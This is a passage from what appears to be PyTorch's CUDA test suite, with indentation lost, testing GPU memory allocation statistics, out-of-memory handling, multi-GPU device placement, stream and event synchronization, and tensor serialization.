tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.cuda.IntStorage))
q_copy[1].fill_(10)
self.assertTrue(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
